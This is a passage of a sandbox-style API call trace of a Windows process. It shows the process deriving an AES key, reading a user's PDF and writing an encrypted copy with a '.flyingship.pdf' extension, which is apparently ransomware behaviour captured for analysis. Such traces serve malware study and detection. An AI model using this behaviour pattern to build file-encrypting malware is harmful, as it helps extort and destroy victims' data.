[0172.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.314] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.314] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.314] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.314] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.314] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.314] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.315] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0172.315] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.315] CryptDestroyHash (hHash=0x90ae18) returned 1 [0172.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\lxb_fxcsv.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.316] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.316] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0172.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0172.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0172.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0172.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0172.320] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0172.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0172.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\lxb_fxcsv.flyingship.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0172.323] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0172.323] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0172.323] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0172.324] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0172.324] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xe8ff, lpOverlapped=0x0) returned 1 [0172.327] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0172.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe8ff) returned 0xa7f018 [0172.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0172.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe8ff) returned 0xa8d920 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.330] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe8ff) returned 0xa7f018 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.330] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0172.331] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.331] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0172.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe8ff) returned 0xa7f018 [0172.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0172.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0172.332] 